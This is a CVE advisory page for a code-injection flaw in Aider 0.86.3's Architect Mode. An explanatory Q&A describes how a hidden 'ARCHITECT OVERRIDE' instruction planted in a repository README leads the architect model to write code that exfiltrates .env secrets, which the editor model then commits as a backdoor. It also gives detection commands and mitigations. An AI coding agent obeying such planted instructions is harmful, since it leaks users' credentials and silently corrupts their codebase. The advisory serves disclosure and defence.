CVE-2026-10175
Code Injection in Aider AI Architect Mode
Publication date: 2026-05-31
Last updated on: 2026-05-31
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| aider-ai | aider | 0.86.3 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Aider-AI Aider version 0.86.3, specifically in the Architect Mode component's editor_coder.run function within the auth.py file. It allows an attacker to perform code injection remotely by exploiting a flaw in how the system processes input from a repository's README.md file.
The issue arises because the architect model's output is passed directly to the editor model without proper input sanitization. An attacker can insert a hidden 'ARCHITECT OVERRIDE' instruction in the README.md file, causing the architect model to generate malicious code, such as importing modules to exfiltrate sensitive files like .env.
This malicious code is then committed back into the repository by the editor model, effectively backdooring the codebase. The vulnerability bypasses the usual input validation layer due to the use of 'preproc=False' in the editor's run method, which disables critical input sanitization.
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized code injection into your codebase, allowing attackers to insert backdoors or malicious functionality.
An attacker can exfiltrate sensitive information, such as environment variables (.env files), which may contain secrets, credentials, or configuration data.
Because the malicious code is committed with normal-looking commit messages, it can be difficult to detect, potentially compromising the integrity and security of your software.
Remote exploitation means attackers do not need local access, increasing the risk of widespread attacks if the repository is publicly accessible.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious commits that include unexpected or malicious code injections, especially in the auth.py file within the Architect Mode component. Since the exploit involves injecting malicious import statements and backdoored code through manipulated README.md files, inspecting recent commits for unusual code patterns or unexpected external network calls is recommended.
You can use git commands to review recent commits for suspicious changes, for example:
- git log -p -- auth.py
- git diff HEAD~1 HEAD -- auth.py
Additionally, scanning for network traffic that attempts to reach suspicious external URLs (such as attacker-controlled domains) can help detect exploitation attempts.
- Use network monitoring tools or commands like tcpdump or Wireshark to filter for unusual outbound HTTP requests, e.g.:
- tcpdump -i any -n host c2.attacker.com
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include preventing the execution of untrusted architect output as editor input without proper validation. Specifically, avoid using the editor_coder.run function with preproc=False, as this disables critical input sanitization.
Review and sanitize any repository content that can influence the architect model, such as README.md files, to ensure they do not contain malicious instructions like "ARCHITECT OVERRIDE".
Monitor and audit commits for unexpected changes, especially those that introduce suspicious import statements or network calls.
If possible, restrict or disable Architect Mode until a patch or official fix is released by the project.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows remote code injection through manipulation of the architect mode in Aider-AI Aider, potentially leading to unauthorized code execution and data exfiltration, such as leaking sensitive files like .env. This kind of security flaw can compromise the confidentiality and integrity of data handled by the system.
Such a compromise could negatively impact compliance with data protection regulations like GDPR and HIPAA, which require strict controls to protect personal and sensitive information from unauthorized access or disclosure.
Because the vulnerability enables attackers to inject malicious code that can exfiltrate sensitive data, organizations using the affected software may face increased risk of data breaches, potentially leading to regulatory violations and associated penalties.